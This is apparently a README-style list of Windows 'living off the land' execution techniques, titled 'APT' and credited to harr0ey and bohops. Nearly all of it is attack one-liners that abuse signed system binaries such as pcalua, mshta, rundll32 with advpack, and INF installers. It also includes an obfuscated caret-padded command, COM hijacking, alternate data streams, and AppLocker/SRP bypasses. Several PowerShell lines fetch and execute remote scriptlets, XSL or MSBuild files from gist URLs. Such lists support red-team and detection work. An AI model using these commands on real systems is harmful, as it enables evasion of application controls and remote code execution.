/LOLBAS222

APT || Execution || Launch || APTs || ( Authors harr0ey, bohops )

####################### | # | APT # | # #######################

( 1 ) Use Pcalua

p^c^a^l^u^a^ ^-^n^ ^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a
^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a calc.exe

( 2 ) Alternate Data Streams ADS:>

cmd.exe:> type C:\Users\Gihad\Desktop\file.bat > C:\Users\Gihad\Desktop\test.txt:x22x2
cmd.exe:> netsh exec C:\Users\Gihad\Desktop\test.txt:x22x2

( 3 ) pnputil.exe Launcher .INF:> Note: everything .INF here works with my INFscript only !

pnputil.exe /add-driver C:\FilesINFExecution.inf /install

&- My Code INFScript Injection Command Line 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 4 ) INFDefaultInstall Launch Execute INFScript

INFDefaultInstall.exe C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 5 ) setupapi.dll Launch Execute My INFScript

setupapi.dll,InstallHinfSection DefaultInstall 132 C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 6 ) DLL Execution Using ( Reflection ) In CPLEx AccessibilityCPL RegServer

&- Add Values in HKLM Name File ms-settings in Open/Shell/Command
&- rundll32 accessibilitycpl.dll,DllRegisterServer 
&- rundll32 shell32.dll,Control_RunDLL "C:\Windows\tem32\desk.cpl"

( 7 ) Language LUA in Files .wlua

wlua.exe C:\testing.wlua
&- Hello World Exe My Code LUA
https://gist.githubusercontent.com/homjxi0e/bbd218dea9bf63fd36524b9777a399f3/raw/888f7e484651fdb733d6261ca002d684a6e5bf9b/Test.wlua

( 8 ) SCT ScriptLet Execution in My INFScript

rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf
&- Raw Code 
https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415

( 9 ) JScript Execute Code Via ( Eval, VSA )

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript')
$attack = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")'
[Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
&- Code Execute
https://gist.githubusercontent.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec/raw/4c8709382280de158b99dd78f91875e32a54bac4/ATPSJScript

( 10 ) MSI Launch Execution ( MsiExec.exe )

 msiexec.exe /passive /i C:\testing.msi /norestart 
 &- File MSI Hello World Exe in .MSI 

( 10v1 ) COM ( Component Object Model ) Hijacking

&- Add Reg in System 
https://gist.githubusercontent.com/homjxi0e/8e42aa716361dc41b1c45a314bea501c/raw/327104671eebad1361210524f34076503e6b8e44/COM-hijacking.reg
&- You can now invoke the CLSID via xwizard.exe
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

( 10v2 ) Execute VBScript Via mshta.exe

&- Execute VBScript Code using mshta.exe
mshta.exe VBScript:Close(Execute("Set S=CreateObject(""WScript.Shell""):If S.AppActivate(""maybe-Run"")=False Then:S.Run(""C:\Windows\system32\Calc.exe""):End If"))
https://gist.githubusercontent.com/homjxi0e/eb16d75f3db6d6081648f2c5c5c98c3b/raw/0870f7553095dcf6519f93c1cf72c6415468140b/VBSExC

( 10v3 ) forfiles.exe Execution Endless

forfiles.exe /c calc.exe

( 10v4 ) Powershell Scriptlet COM Object Hijacking via System.Activator

$COMobj = [activator]::CreateInstance([type]::GetTypeFromCLSID("{00020000-0000-0000-C000-000000000046}"));$COMobj.Exec();
https://gist.github.com/homjxi0e/40f30c3be62c6ef152d6f6fffa9dba3c

( 10v5 ) ScriptRunner.exe Execution

ScriptRunner.exe -appvscript C:\Windows\System32\calc.exe

( 10v6 ) msdt.exe Execute EXE-MSI Via Reader XML with Launch by Pcwrun.exe

 msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
 &- link file PCW8E57.xml
 https://gist.github.com/homjxi0e/3f35212db81b9375b7906031a40c6d87

( 10v7 ) Launch MSI Package Execution Powershell

install-Package C:\test.msi
https://github.com/homjxi0e/MSIScript/blob/master/Exec-Execute.msi

( 10v8 ) DLL Execute CML Launch Application

rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe

( 10v9 ) HTA/MSI Execute Using OpenWith.exe

Whitelisting SRP Bypassing Using OpenWith.exe To Launch HTA/MSI Execution 
&- OpenWith.exe /c C:\test.hta 
&- OpenWith.exe /c C:\testing.msi

( 10v11 ) XrML Digital License (.xrm-ms) ActiveX

iexplorer C:\test.xrm-ms 
https://gist.github.com/homjxi0e/099d8f35f3b2e1b7daa7cbe366df1ed3
 

( 10v12 )

start C:\obj.url
https://gist.github.com/homjxi0e/0023a9cb5d4fee198019f87bd348effc

( 10v13 ) ActiveX execution using an SVG Document

iexplorer C:\PoC.svg
https://gist.github.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0

(10v14) Dxcap.exe Abuse

Dxcap.exe -c C:\Windows\System32\notepad.exe    

(Note) Contributed by @bohops ( 11 ) HTA Launch Execution ( url.dll )

Rundll32.exe url.dll,OpenURL FileHTA Or Anything 

( 12 ) SCT Launch Execution InSide INFScript ( ieadvpack.dll )

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1, 

( 13 ) XML Launch Execution Via Reflection,Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj); 
$e.build();

( 14 ) CSharp Launch Execution Via Reflection.Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('http://Microsoft.Build '); $e=new-object http://Microsoft.Build.Evaluation.Project('evil.csproj'); $e.Build();

( 15 ) SCT Execution Via INFScript By ( advpack.dll )

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

( 16 ) XML Launch Execution Via Reader XML,Transform Object Powershell

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

( 17 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.VisualBasic )

 [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …').Exec(0)

( 18 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.JScript )

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

( 19 ) Commandline APT Launch Execution Applocker/Bypassing Via ( CL_LoadAssembly )

import-module C:\windows\diagnostics\system\AERO\CL_LoadAssembly.ps1
LoadAssemblyFromPath C:\Windows\System32\calc.exe

( 20 ) HTA Launch Execution Via ( shdocvw.dll )

rundll32.exe shdocvw.dll, OpenURL <path to local URL file>

( 21 ) HTA Launch Execution Via ( ieframe.dll )

rundll32.exe ieframe.dll, OpenURL <path to local URL file>

( 22 ) Commandline Execute Via Vshadow.exe

 Vshadow exec calc.exe

( 23 ) CSharp Execution Via ProjectInstance RA Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build')
$p="c:\test\test.csproj"
$e=new-object Microsoft.Build.Execution.ProjectInstance($p)
$e.build()